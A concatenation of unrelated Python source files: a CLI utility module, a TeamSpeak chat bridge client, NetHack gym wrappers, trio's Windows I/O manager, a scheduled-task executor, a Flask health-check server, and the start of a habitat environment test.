(d[0], clear_ansi_color_codes(str_join(' ', d[1:])) if len(d[1:]) > 1 else d[1]) for d in tabular_data))
elif tablefmt == 'json-maps':
import collections
json_data = {}
if not headers and tabular_data:
headers = ['key%s' % i for i in range(len(tabular_data[0]))]
for ls in tabular_data:
d = collections.OrderedDict()
for i, v in enumerate(ls[1:]):
v = clear_ansi_color_codes(v)
d[headers[i + 1]] = v
json_data[clear_ansi_color_codes(ls[0])] = d
return colorize_json(json_data)
elif tablefmt == 'plain':
return tabulate_(tabular_data, (), 'plain', floatfmt, numalign, stralign, missingval)
else:
return tabulate_(tabular_data, headers, tablefmt, floatfmt, numalign, stralign, missingval)
def str_join(sep, ls):
"""Return a joined string of all the members of the list converted in strings"""
return sep.join(str(elem) for elem in ls)
class AuthenticatorNotFound(click.UsageError):
def __init__(self, machine, *args, **kwargs):
super(AuthenticatorNotFound, self).__init__('User credentials required for machine {}.'.format(machine), *args,
**kwargs)
self.machine = machine
get_authenticator_hints = {}
def get_authenticator(machine, askpass=True, required=True):
login, password = None, None
netrc_keyring = False
try:
import keyring as _ # NOQA:F401
from clk.keyring_netrc import NetrcKeyring as Netrc
except ModuleNotFoundError:
from clk.netrc import Netrc
try:
keyring = get_keyring()
if isinstance(keyring, Netrc):
netrc_keyring = True
try:
login, password = json.loads(keyring.get_password('clk', machine))
except Exception:
netrc = get_netrc_keyring()
netrc_keyring = True
login, password = json.loads(netrc.get_password('clk', machine))
except Exception:
LOGGER.warning('I could not automatically find your login/password for {}.'.format(machine))
from clk import completion
if (login is None or password is None) and askpass and not completion.IN_COMPLETION:
LOGGER.info('Please enter your username and password for {}'.format(machine))
if machine in get_authenticator_hints:
LOGGER.info('Hint: {}'.format(get_authenticator_hints[machine]))
login = input('%s username: ' % machine)
password = getpass.getpass('%s password: ' % machine)
try:
LOGGER.info('Saving the credentials in your keyring: {}'.format(keyring.name))
keyring.set_password('clk', machine, json.dumps((login, password)))
except Exception:
LOGGER.warning('I could not save your credentials.')
if netrc_keyring:
LOGGER.warning('You can save them manually by running:'
' `passwords {} netrc-set {}`'.format(machine, login))
if login is None or password is None:
if required:
raise AuthenticatorNotFound(machine)
else:
return None
return login, password
def assert_main_module():
assert main_module != '__main__', ('You cannot call the main module, for there is none.')
def call_me(*cmd):
assert_main_module()
return call([sys.executable, '-c', 'from {} import main; main()'.format(main_module)] + list(cmd))
def check_my_output(*cmd):
assert_main_module()
return safe_check_output([sys.executable, '-c', 'from {} import main; main()'.format(main_module)] + list(cmd))
def to_bool(s):
"""Converts a string to a boolean"""
from distutils.util import strtobool
return bool(strtobool(s))
def to_string(s):
if isinstance(s, str):
return s
return str(s)
def parsedatetime(value):
if isinstance(value, datetime.datetime):
return value, None
import parsedatetime as _parsedatetime
cal = _parsedatetime.Calendar()
return cal.parseDT(value, sourceTime=datetime.datetime.today())
def value_to_string(value):
return (' '.join(map(quote, value)) if type(value) is tuple else str(value) if value else '')
def is_port_available(port, hostname='127.0.0.1'):
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = s.connect_ex((hostname, port))
s.close()
return result != 0
def find_available_port(start_port, hostname='127.0.0.1'):
port = start_port
while not is_port_available(port, hostname):
port += 1
return port
|
TSConnection.py
|
from pydoc import cli
import socket
import threading
import time
import copy
import traceback
from queue import Queue
class TSConnection:
_send_queue = Queue()
_recv_queue = Queue()
_connected = False
_running = False
_client_map = {}
_channel_map = {}
_log = None
_client_channel_moved = False
def __init__(self, server, port, nick, username, password):
self._server = server
self._port = port
self._nick = nick
self._username = username
self._password = password
self._socket = socket.socket()
def run(self):
self._log = open("ts.log", 'a', 1)
self._running = True
self.connect()
self._recv_thread = threading.Thread(target=self.listen)
self._recv_thread.start()
self._send_thread = threading.Thread(target=self.process_send_queue)
self._send_thread.start()
self._keep_alive_thread = threading.Thread(target=self.keepalive)
self._keep_alive_thread.start()
def keepalive(self):
while self._running:
if self._connected:
if(hasattr(self, "_botclid") and self._client_channel_moved == False):
# move the bot itself to channel 1
print("[TS] Moving myself to channel 1")
self._socket.send(
bytes("clientmove clid=%s cid=1\n" % (self._botclid,), 'UTF-8'))
self._client_channel_moved = True
self._socket.send(bytes("clientlist\n", 'UTF-8'))
self._socket.send(bytes("channellist\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=channel id=1\n", 'UTF-8'))
time.sleep(1)
def connect(self):
print("[TS] Connecting...")
self._connected = False
try:
self._socket = socket.socket()
self._socket.connect((self._server, self._port))
self._socket.send(bytes("login %s %s\n" %
(self._username, self._password), 'UTF-8'))
self._socket.send(bytes("use 1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=textchannel id=1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=textserver id=1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=channel id=1\n", 'UTF-8'))
self._socket.send(
bytes("servernotifyregister event=server id=1\n", 'UTF-8'))
self._socket.send(
bytes("clientupdate client_nickname=%s\n" % self._nick, 'UTF-8'))
self._socket.send(
bytes("clientlist\n", 'UTF-8'))
print("[TS] Connected")
self._connected = True
except:
self._connected = False
print("connect to %s on port %s failed.\n" %
(self._server, self._port))
print(traceback.format_exc())
return
def listen(self):
while self._running:
try:
while not self._connected:
self.connect()
data = self._socket.recv(4096)
if len(data) == 0:
print("connection to %s lost. Attempting to reconnect...\n" % (
self._server, ))
self._connected = False
continue
data = data.decode("UTF-8")
data.strip()
#print(data + "\n")
parts = data.split()
command = parts[0]
args = {}
for pair in parts[1:]:
bits = pair.partition("=")
args[bits[0]] = bits[2]
if command == "notifytextmessage":
msg = self.decode(args["msg"])
msg_from = self.decode(args["invokername"])
if msg_from.startswith("[Bridge]"):
continue
self._recv_queue.put(("MSG", msg_from, "", msg))
elif command == "notifycliententerview":
msg_from = self.decode(args["client_nickname"])
#self._client_map[args["clid"]]["client_nickname"] = msg_from
self._recv_queue.put(("CONNECT", msg_from, ""))
elif command == "notifyclientleftview":
msg_from = self.decode(self._client_map[args["clid"]]["client_nickname"])
del self._client_map[args["clid"]]
self._recv_queue.put(("QUIT", msg_from, ""))
elif command.startswith("cid"):
data = data.split("\n\r")[0]
for channel in data.split("|"):
args = {}
for pair in channel.split():
bits = pair.partition("=")
args[bits[0]] = bits[2]
if "cid" in args:
self._channel_map[args["cid"]] = args if not args["cid"] in self._channel_map else {
**self._channel_map[args["cid"]], **args}
elif command.startswith("clid"):
data = data.split("\n\r")[0]
# 清除原来的频道用户列表
for cid in self._channel_map:
self._channel_map[cid]["members"] = []
old_client_map = copy.deepcopy(self._client_map) # 保存旧有用户信息,用于对比频道切换
for client in data.split("|"):
args = {}
for pair in client.split():
bits = pair.partition("=")
args[bits[0]] = bits[2]
if "clid" in args and "client_nickname" in args:
if args["client_nickname"] == self._nick:
self._botclid = args["clid"]
self._client_map[args["clid"]] = args
if args["cid"] in self._channel_map:
self._channel_map[args["cid"]]["members"].append(args["clid"])
# 检测用户是否切换频道
for client in self._client_map.items():
client = client[1]
if client["client_nickname"] != self._nick and client["clid"] in old_client_map and client["cid"] != old_client_map[client["clid"]]["cid"]:
from_channel = self._channel_map[old_client_map[client["clid"]]["cid"]]
from_channel_name = self.get_channel_name_with_relation(from_channel)
to_channel = self._channel_map[client["cid"]]
to_channel_name = self.get_channel_name_with_relation(to_channel)
self._recv_queue.put(
("MOVE", self.decode(client["client_nickname"]),
from_channel_name, to_channel_name))
except:
print(traceback.format_exc())
def encode(self, data):
data = data.replace('\\', '\\\\')
data = data.replace('/', '\\/')
data = data.replace(' ', '\\s')
data = data.replace('|', '\\p')
data = data.replace('\n', '\\n')
data = data.replace('\r', '\\r')
data = data.replace('\t', '\\t')
return data
def decode(self, data):
data = data.replace('\\\\', '\\')
data = data.replace('\\/', '/')
data = data.replace('\\s', ' ')
data = data.replace('\\p', '|')
data = data.replace('\\a', '')
data = data.replace('\\b', '')
data = data.replace('\\f', '')
data = data.replace('\\n', '\n')
data = data.replace('\\r', '\r')
data = data.replace('\\t', ' ')
data = data.replace('\\v', '\n')
data = data.replace('[URL]', '')
data = data.replace('[/URL]', '')
return data
def relay_message(self, user, msg):
msg = self.encode(msg)
user = self.encode(user)
self.send_raw("clientupdate client_nickname=[Bridge]" + user)
self.send_raw("sendtextmessage targetmode=2 target=1 msg=" + msg)
self.send_raw("clientupdate client_nickname=" + self._nick)
def relay_global_message(self, user, msg):
msg = self.encode(msg)
user = self.encode(user)
self.send_raw("clientupdate client_nickname=[Bridge]" + user)
self.send_raw("sendtextmessage targetmode=3 target=1 msg=" + msg)
self.send_raw("clientupdate client_nickname=" + self._nick)
def send_text(self, text):
if not text:
return
text = self.encode(text)
self.send_raw("sendtextmessage targetmode=2 target=1 msg=" + text)
def send_raw(self, text):
msg = "%s\n" % (text, )
self._send_queue.put(msg)
def poll(self):
if self._recv_queue.empty():
return None
return self._recv_queue.get()
def process_send_queue(self):
while self._running:
if self._connected and not self._send_queue.empty():
self._socket.send(bytes(self._send_queue.get(), 'UTF-8'))
self._send_queue.task_done()
time.sleep(0.01)
def get_channel_name_with_relation(self, channel, channel_name=""):
if(channel["pid"] != "0"):
channel_name = " - " + self.decode(channel["channel_name"]) + channel_name
return self.get_channel_name_with_relation(self._channel_map[channel["pid"]], channel_name)
else:
return self.decode(channel["channel_name"]) + channel_name
def disconnect(self):
print("[TS] Disconnecting")
self._running = False
self._connected = False
self._socket.close()
self._send_thread.join()
self._recv_thread.join()
def running(self):
return self._running
def client_map(self):
return self._client_map
def channel_map(self):
return self._channel_map
|
wrapper.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
from collections import defaultdict
import gym
import numpy as np
import queue
import threading
class CounterWrapper(gym.Wrapper):
def __init__(self, env, state_counter="none"):
# intialize state counter
self.state_counter = state_counter
if self.state_counter != "none":
self.state_count_dict = defaultdict(int)
# this super() goes to the parent of the particular task, not to object
super().__init__(env)
def step(self, action):
# add state counting to step function if desired
step_return = self.env.step(action)
if self.state_counter == "none":
# do nothing
return step_return
obs, reward, done, info = step_return
if self.state_counter == "ones":
# treat every state as unique
state_visits = 1
elif self.state_counter == "coordinates":
# use the location of the agent in the dungeon to accumulate visits
features = obs["blstats"]
x = features[0]
y = features[1]
d = features[12]
coord = (d, x, y)
self.state_count_dict[coord] += 1
state_visits = self.state_count_dict[coord]
else:
raise NotImplementedError("state_counter=%s" % self.state_counter)
obs.update(state_visits=np.array([state_visits]))
if done:
self.state_count_dict.clear()
return step_return
def reset(self, wizkit_items=None):
# reset state counter when env resets
obs = self.env.reset(wizkit_items=wizkit_items)
if self.state_counter != "none":
self.state_count_dict.clear()
# current state counts as one visit
obs.update(state_visits=np.array([1]))
return obs
class CropWrapper(gym.Wrapper):
def __init__(self, env, h=9, w=9, pad=0, keys=("tty_chars", "tty_colors")):
super().__init__(env)
self.env = env
self.h = h
self.w = w
self.pad = pad
self.keys = keys
assert self.h % 2 == 1
assert self.w % 2 == 1
self.last_observation = None
self._actions = self.env._actions
def render(self, mode="human", crop=True):
self.env.render()
obs = self.last_observation
tty_chars_crop = obs["tty_chars_crop"]
tty_colors_crop = obs["tty_colors_crop"]
rendering = self.env.get_tty_rendering(
tty_chars_crop, tty_colors_crop, print_guides=True
)
print(rendering)
def step(self, action):
next_state, reward, done, info = self.env.step(action)
dh = self.h // 2
dw = self.w // 2
(y, x) = next_state["tty_cursor"]
x += dw
y += dh
for key in self.keys:
obs = next_state[key]
obs = np.pad(
obs,
pad_width=(dw, dh),
mode="constant",
constant_values=self.pad,
)
next_state[key + "_crop"] = obs[
y - dh : y + dh + 1, x - dw : x + dw + 1
]
self.last_observation = next_state
return next_state, reward, done, info
def reset(self, wizkit_items=None):
obs = self.env.reset(wizkit_items=wizkit_items)
obs["tty_chars_crop"] = np.zeros((self.h, self.w), dtype=np.uint8)
obs["tty_colors_crop"] = np.zeros((self.h, self.w), dtype=np.int8)
self.last_observation = obs
return obs
class PrevWrapper(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.env = env
self.last_observation = None
self._actions = self.env._actions
def step(self, action):
next_state, reward, done, info = self.env.step(action)
next_state["prev_reward"] = np.array([reward], dtype=np.float32)
next_state["prev_action"] = np.array([action], dtype=np.uint8)
self.last_observation = next_state
return next_state, reward, done, info
def reset(self, wizkit_items=None):
obs = self.env.reset(wizkit_items=wizkit_items)
obs["prev_reward"] = np.zeros(1, dtype=np.float32)
obs["prev_action"] = np.zeros(1, dtype=np.uint8)
self.last_observation = obs
return obs
def target(resetqueue, readyqueue):
while True:
env = resetqueue.get()
if env is None:
return
obs = env.reset()
readyqueue.put((obs, env))
class CachedEnvWrapper(gym.Env):
def __init__(self, envs, num_threads=2):
self._envs = envs
# This could alternatively also use concurrent.futures. I hesitate to do
# that as futures.wait would have me deal with sets all the time where they
# are really not necessary.
self._resetqueue = queue.SimpleQueue()
self._readyqueue = queue.SimpleQueue()
self._threads = [
threading.Thread(
target=target, args=(self._resetqueue, self._readyqueue)
)
for _ in range(num_threads)
]
for t in self._threads:
t.start()
for env in envs[1:]:
self._resetqueue.put(env)
self._env = envs[0]
def reset(self):
self._resetqueue.put(self._env)
obs, self._env = self._readyqueue.get()
return obs
def step(self, action):
return self._env.step(action)
def close(self):
for _ in self._threads:
self._resetqueue.put(None)
for t in self._threads:
t.join()
for env in self._envs:
env.close()
def seed(self, seed=None):
self._env.seed(seed)
def unwrapped(self):
return self._env
def __str__(self):
return "<CachedEnvWrapper envs=%s>" % [str(env) for env in self._envs]
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
return False # Propagate exception.
|
_io_windows.py
|
import math
import itertools
from contextlib import contextmanager
import socket as stdlib_socket
from select import select
import threading
from collections import deque
import signal
import attr
from .. import _core
from . import _public, _hazmat
from ._wakeup_socketpair import WakeupSocketpair
from ._windows_cffi import (
ffi, kernel32, INVALID_HANDLE_VALUE, raise_winerror, ErrorCodes,
)
# There's a lot to be said about the overall design of a Windows event
# loop. See
#
# https://github.com/python-trio/trio/issues/52
#
# for discussion. This now just has some lower-level notes:
#
# How IOCP fits together:
# - each notification event (OVERLAPPED_ENTRY) contains:
# - the "completion key" (an integer)
# - pointer to OVERLAPPED
# - dwNumberOfBytesTransferred
# - and in addition, for regular I/O, the OVERLAPPED structure gets filled in
# with:
# - result code (named "Internal")
# - number of bytes transferred (named "InternalHigh"); redundant with
# dwNumberOfBytesTransferred *if* this is a regular I/O event.
#
# There are also some other entries in OVERLAPPED which only matter on input:
# - Offset and OffsetHigh which are inputs to {Read,Write}File and
# otherwise always zero
# - hEvent which is for if you aren't using IOCP; we always set it to zero.
#
# PostQueuedCompletionStatus: lets you set the 3 magic scalars to whatever you
# want.
#
# Regular I/O events: these are identified by the pointer-to-OVERLAPPED. The
# "completion key" is a property of a particular handle being operated on that
# is set when associating the handle with the IOCP. We don't use it, so should
# always set it to zero.
#
# Job notifications: effectively uses PostQueuedCompletionStatus, the
# "completion key" is used to identify which job we're talking about, and the
# other two scalars are overloaded to contain arbitrary data.
#
# So our strategy is:
# - when binding handles to the IOCP, we always set the completion key to 0.
# when dispatching received events, when the completion key is 0 we dispatch
# based on lpOverlapped
# - thread-safe wakeup uses completion key 1
# - other completion keys are available for user use
# handles:
# - for now we'll just use 1 thread per handle, should file a QoI bug to
# multiplex multiple handles onto the same thread
# - cancel via QueueUserAPC
# - I'm a little nervous about the callback to QueueUserAPC... cffi's
# ABI-level callbacks require executable memory and who knows how happy the
# re-enter-Python code will be about being executed in APC context. (I guess
# APC context here is always "on a thread running Python code but that has
# dropped the GIL", so maybe there's no issue?)
# - on 32-bit windows, Sleep makes a great QueueUserAPC callback...
# - WakeByAddressAll and WakeByAddresSingle have the right signature
# everywhere!
# - there are also a bunch that take a *-sized arg and return BOOL,
# e.g. CloseHandle, SetEvent, etc.
# - or free() from the CRT (free(NULL) is a no-op says the spec)
# - but do they have the right calling convention? QueueUserAPC wants an
# APCProc which is VOID CALLBACK f(ULONG_PTR)
# CALLBACK = __stdcall
# ugh, and free is not annotated, so probably __cdecl
# but most of the rest are WINAPI which is __stdcall
# ...but, on x86-64 calling convention distinctions are erased! so we can
# do Sleep on x86-32 and free on x86-64...
def _check(success):
if not success:
raise_winerror()
return success
def _handle(obj):
# For now, represent handles as either cffi HANDLEs or as ints. If you
# try to pass in a file descriptor instead, it's not going to work
# out. (For that msvcrt.get_osfhandle does the trick, but I don't know if
# we'll actually need that for anything...) For sockets this doesn't
# matter, Python never allocates an fd. So let's wait until we actually
# encounter the problem before worrying about it.
if type(obj) is int:
return ffi.cast("HANDLE", obj)
else:
return obj
@attr.s(frozen=True)
class _WindowsStatistics:
tasks_waiting_overlapped = attr.ib()
completion_key_monitors = attr.ib()
tasks_waiting_socket_readable = attr.ib()
tasks_waiting_socket_writable = attr.ib()
iocp_backlog = attr.ib()
backend = attr.ib(default="windows")
@attr.s(frozen=True)
class CompletionKeyEventInfo:
lpOverlapped = attr.ib()
dwNumberOfBytesTransferred = attr.ib()
class WindowsIOManager:
def __init__(self):
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363862(v=vs.85).aspx
self._closed = True
self._iocp = _check(kernel32.CreateIoCompletionPort(
INVALID_HANDLE_VALUE, ffi.NULL, 0, 0))
self._closed = False
self._iocp_queue = deque()
self._iocp_thread = None
self._overlapped_waiters = {}
self._completion_key_queues = {}
# Completion key 0 is reserved for regular IO events
self._completion_key_counter = itertools.count(1)
# {stdlib socket object: task}
# except that wakeup socket is mapped to None
self._socket_waiters = {"read": {}, "write": {}}
self._main_thread_waker = WakeupSocketpair()
self._socket_waiters["read"][self._main_thread_waker.wakeup_sock] = None
# This is necessary to allow control-C to interrupt select().
# https://github.com/python-trio/trio/issues/42
if threading.current_thread() == threading.main_thread():
fileno = self._main_thread_waker.write_sock.fileno()
self._old_signal_wakeup_fd = signal.set_wakeup_fd(fileno)
def statistics(self):
return _WindowsStatistics(
tasks_waiting_overlapped=len(self._overlapped_waiters),
completion_key_monitors=len(self._completion_key_queues),
tasks_waiting_socket_readable=len(self._socket_waiters["read"]),
tasks_waiting_socket_writable=len(self._socket_waiters["write"]),
iocp_backlog=len(self._iocp_queue),
)
def close(self):
if not self._closed:
self._closed = True
_check(kernel32.CloseHandle(self._iocp))
if self._iocp_thread is not None:
self._iocp_thread.join()
self._main_thread_waker.close()
if threading.current_thread() == threading.main_thread():
signal.set_wakeup_fd(self._old_signal_wakeup_fd)
def __del__(self):
# Need to make sure we clean up self._iocp (raw handle) and the IOCP
# thread.
self.close()
def handle_io(self, timeout):
# Step 0: the first time through, initialize the IOCP thread
if self._iocp_thread is None:
# The rare non-daemonic thread -- close() should always be called,
# even on error paths, and we want to join it there.
self._iocp_thread = threading.Thread(
target=self._iocp_thread_fn, name="trio-IOCP")
self._iocp_thread.start()
# Step 1: select for sockets, with the given timeout.
# If there are events queued from the IOCP thread, then the timeout is
# implicitly reduced to 0 b/c the wakeup socket has pending data in
# it.
def socket_ready(what, sock, result=_core.Value(None)):
task = self._socket_waiters[what].pop(sock)
_core.reschedule(task, result)
def socket_check(what, sock):
try:
select([sock], [sock], [sock], 0)
except OSError as exc:
socket_ready(what, sock, result=_core.Error(exc))
def do_select():
r_waiting = self._socket_waiters["read"]
w_waiting = self._socket_waiters["write"]
# We select for exceptional conditions on the writable set because
# on Windows, a failed non-blocking connect shows up as
# "exceptional". Everyone else uses "writable" for this, so we
# normalize it.
r, w1, w2 = select(r_waiting, w_waiting, w_waiting, timeout)
return r, set(w1 + w2)
try:
r, w = do_select()
except OSError:
# Some socket was closed or similar. Track it down and get rid of
# it.
for what in ["read", "write"]:
for sock in self._socket_waiters[what]:
socket_check(what, sock)
r, w = do_select()
for sock in r:
if sock is not self._main_thread_waker.wakeup_sock:
socket_ready("read", sock)
for sock in w:
socket_ready("write", sock)
# Step 2: drain the wakeup socket.
# This must be done before checking the IOCP queue.
self._main_thread_waker.drain()
# Step 3: process the IOCP queue. If new events arrive while we're
# processing the queue then we leave them for next time.
# XX should probably have some sort emergency bail out if the queue
# gets too long?
for _ in range(len(self._iocp_queue)):
msg = self._iocp_queue.popleft()
if isinstance(msg, BaseException):
# IOCP thread encountered some unexpected error -- give up and
# let the user know.
raise msg
batch, received = msg
for i in range(received):
entry = batch[i]
if entry.lpCompletionKey == 0:
# Regular I/O event, dispatch on lpOverlapped
waiter = self._overlapped_waiters.pop(entry.lpOverlapped)
_core.reschedule(waiter)
else:
# dispatch on lpCompletionKey
queue = self._completion_key_queues[entry.lpCompletionKey]
info = CompletionKeyEventInfo(
lpOverlapped=
int(ffi.cast("uintptr_t", entry.lpOverlapped)),
dwNumberOfBytesTransferred=
entry.dwNumberOfBytesTransferred)
queue.put_nowait(info)
def _iocp_thread_fn(self):
# This thread sits calling GetQueuedCompletionStatusEx forever. To
# signal that it should shut down, the main thread just closes the
# IOCP, which causes GetQueuedCompletionStatusEx to return with an
# error:
IOCP_CLOSED_ERRORS = {
# If the IOCP is closed while we're blocked in
# GetQueuedCompletionStatusEx, then we get this error:
ErrorCodes.ERROR_ABANDONED_WAIT_0,
# If the IOCP is already closed when we initiate a
# GetQueuedCompletionStatusEx, then we get this error:
ErrorCodes.ERROR_INVALID_HANDLE,
}
while True:
max_events = 1
batch = ffi.new("OVERLAPPED_ENTRY[]", max_events)
received = ffi.new("PULONG")
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa364988(v=vs.85).aspx
try:
_check(kernel32.GetQueuedCompletionStatusEx(
self._iocp, batch, max_events, received, 0xffffffff, 0))
except OSError as exc:
if exc.winerror in IOCP_CLOSED_ERRORS:
# The IOCP handle was closed; time to shut down.
return
else:
self._iocp_queue.append(exc)
return
self._iocp_queue.append((batch, received[0]))
self._main_thread_waker.wakeup_thread_and_signal_safe()
@_public
@_hazmat
def current_iocp(self):
return int(ffi.cast("uintptr_t", self._iocp))
@_public
@_hazmat
def register_with_iocp(self, handle):
handle = _handle(obj)
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363862(v=vs.85).aspx
_check(kernel32.CreateIoCompletionPort(handle, self._iocp, 0, 0))
@_public
@_hazmat
async def wait_overlapped(self, handle, lpOverlapped):
handle = _handle(obj)
if isinstance(lpOverlapped, int):
lpOverlapped = ffi.cast("LPOVERLAPPED", lpOverlapped)
if lpOverlapped in self._overlapped_waiters:
raise RuntimeError(
"another task is already waiting on that lpOverlapped")
task = _core.current_task()
self._overlapped_waiters[lpOverlapped] = task
raise_cancel = None
def abort(raise_cancel_):
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363792(v=vs.85).aspx
# the _check here is probably wrong -- I guess we should just
# ignore errors? but at least it will let us learn what errors are
# possible -- the docs are pretty unclear.
nonlocal raise_cancel
raise_cancel = raise_cancel_
_check(kernel32.CancelIoEx(handle, lpOverlapped))
return _core.Abort.FAILED
await _core.yield_indefinitely(abort)
if lpOverlapped.Internal != 0:
if lpOverlapped.Internal == ErrorCodes.ERROR_OPERATION_ABORTED:
assert raise_cancel is not None
raise_cancel()
else:
raise_winerror(lpOverlapped.Internal)
@_public
@_hazmat
@contextmanager
def monitor_completion_key(self):
key = next(self._completion_key_counter)
queue = _core.UnboundedQueue()
self._completion_key_queues[key] = queue
try:
yield (key, queue)
finally:
del self._completion_key_queues[key]
async def _wait_socket(self, which, sock):
# Using socket objects rather than raw handles gives better behavior
# if someone closes the socket while another task is waiting on it. If
# we just kept the handle, it might be reassigned, and we'd be waiting
# on who-knows-what. The socket object won't be reassigned, and it
# switches its fileno() to -1, so we can detect the offending socket
# and wake the appropriate task. This is a pretty minor benefit (I
# think it can only make a difference if someone is closing random
# sockets in another thread? And on unix we don't handle this case at
# all), but hey, why not.
if type(sock) is not stdlib_socket.socket:
raise TypeError("need a stdlib socket")
if sock in self._socket_waiters[which]:
raise RuntimeError(
"another task is already waiting to {} this socket"
.format(which))
self._socket_waiters[which][sock] = _core.current_task()
def abort(_):
del self._socket_waiters[which][sock]
return _core.Abort.SUCCEEDED
await _core.yield_indefinitely(abort)
@_public
@_hazmat
async def wait_socket_readable(self, sock):
await self._wait_socket("read", sock)
@_public
@_hazmat
async def wait_socket_writable(self, sock):
await self._wait_socket("write", sock)
# This has cffi-isms in it and is untested... but it demonstrates the
# logic we'll want when we start actually using overlapped I/O.
#
# @_public
# @_hazmat
# async def perform_overlapped(self, handle, submit_fn):
# # submit_fn(lpOverlapped) submits some I/O
# # it may raise an OSError with ERROR_IO_PENDING
# await _core.yield_if_cancelled()
# self.register_with_iocp(handle)
# lpOverlapped = ffi.new("LPOVERLAPPED")
# try:
# submit_fn(lpOverlapped)
# except OSError as exc:
# if exc.winerror != Error.ERROR_IO_PENDING:
# await _core.yield_briefly_no_cancel()
# raise
# await self.wait_overlapped(handle, lpOverlapped)
# return lpOverlapped
|
asyncscheduledtask.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import time
from threading import Thread
from log import LogFactory
log = LogFactory().get_log(__name__)
class AbstractAsyncScheduledTask:
"""
Exposes the contract to follow to implement a scheduled task to be executed by the ScheduledExecutor
"""
def execute_task(self):
"""
Override this method and implement the task to be executed by the ScheduledExecutor with a specified
interval.
"""
raise NotImplementedError
class ScheduledExecutor(Thread):
"""
Executes a given task with a given interval until being terminated
"""
def __init__(self, delay, task):
"""
Creates a ScheduledExecutor thread to handle interval based repeated execution of a given task of type
AbstractAsyncScheduledTask
:param int delay: The interval to keep between executions
:param AbstractAsyncScheduledTask task: The task to be implemented
:return:
"""
Thread.__init__(self)
self.delay = delay
""" :type : int """
self.task = task
""" :type : AbstractAsyncScheduledTask """
self.terminated = False
""" :type : bool """
self.setName("ScheduledExecutorForTask%s" % self.task.__class__.__name__)
self.setDaemon(True)
log.debug("Created a ScheduledExecutor thread for task %s" % self.task.__class__.__name__)
def run(self):
"""
Start the scheduled task with a sleep time of delay in between
:return:
"""
while not self.terminated:
time.sleep(self.delay)
if not self.terminated:
task_thread = Thread(target=self.task.execute_task)
task_thread.setName("WorkerThreadForTask%s" % self.task.__class__.__name__)
task_thread.setDaemon(True)
log.debug("Starting a worker thread for the Scheduled Executor for task %s" % self.task.__class__.__name__)
task_thread.start()
def terminate(self):
"""
Terminate the scheduled task. Allow a maximum of 'delay' seconds to be terminated.
:return: void
"""
self.terminated = True
|
__init__.py
|
import functools
import time
from threading import Thread
import os
from flask import Flask
def run_function_in_background(target):
t = Thread(target=target)
t.setDaemon(True)
t.start()
def http_transponder(port):
app = Flask(__name__)
@app.route("/")
def main():
return 'I am the health check transponder'
@app.route("/ping")
def ping():
return 'pong'
@app.route("/are_you_ok")
def are_you_ok():
return "I'm OK"
app.run(host='0.0.0.0', port=port)
# try get port config from environment
http_port = os.getenv('HEALTH_CHECK_TRANSPONDER_PORT', 9998)
run_health_check_transponder_in_background = functools.partial(
run_function_in_background,
functools.partial(http_transponder, port=http_port)
)
if __name__ == "__main__":
run_health_check_transponder_in_background()
for _ in range(100):
time.sleep(1)
print('.', end='', flush=True)
|
test_habitat_env.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing as mp
import os
import numpy as np
import pytest
import habitat
from habitat.config.default import get_config
from habitat.core.simulator import AgentState
from habitat.datasets.pointnav.pointnav_dataset import PointNavDatasetV1
from habitat.sims.habitat_simulator import SimulatorActions
from habitat.tasks.nav.nav_task import NavigationEpisode, NavigationGoal
CFG_TEST = "configs/test/habitat_all_sensors_test.yaml"
NUM_ENVS = 4
class DummyRLEnv(habitat.RLEnv):
def __init__(self, config, dataset=None, env_ind=0):
super(DummyRLEnv, self).__init__(config, dataset)
self._env_ind = env_ind
def get_reward_range(self):
return -1.0, 1.0
def get_reward(self, observations):
return 0.0
def get_done(self, observations):
done = False
if self._env.episode_over:
done = True
return done
def get_info(self, observations):
return {}
def get_env_ind(self):
return self._env_ind
def set_env_ind(self, new_env_ind):
self._env_ind = new_env_ind
def _load_test_data():
configs = []
datasets = []
for i in range(NUM_ENVS):
config = get_config(CFG_TEST)
if not PointNavDatasetV1.check_config_paths_exist(config.DATASET):
pytest.skip("Please download Habitat test data to data folder.")
datasets.append(
habitat.make_dataset(
id_dataset=config.DATASET.TYPE, config=config.DATASET
)
)
config.defrost()
config.SIMULATOR.SCENE = datasets[-1].episodes[0].scene_id
if not os.path.exists(config.SIMULATOR.SCENE):
pytest.skip("Please download Habitat test data to data folder.")
config.freeze()
configs.append(config)
return configs, datasets
def _vec_env_test_fn(configs, datasets, multiprocessing_start_method):
num_envs = len(configs)
env_fn_args = tuple(zip(configs, datasets, range(num_envs)))
envs = habitat.VectorEnv(
env_fn_args=env_fn_args,
multiprocessing_start_method=multiprocessing_start_method,
)
envs.reset()
non_stop_actions = [
v
for v in range(len(SimulatorActions))
if v != SimulatorActions.STOP.value
]
for _ in range(2 * configs[0].ENVIRONMENT.MAX_EPISODE_STEPS):
observations = envs.step(np.random.choice(non_stop_actions, num_envs))
assert len(observations) == num_envs
def test_vectorized_envs_forkserver():
configs, datasets = _load_test_data()
_vec_env_test_fn(configs, datasets, "forkserver")
def test_vectorized_envs_spawn():
configs, datasets = _load_test_data()
_vec_env_test_fn(configs, datasets, "spawn")
def _fork_test_target(configs, datasets):
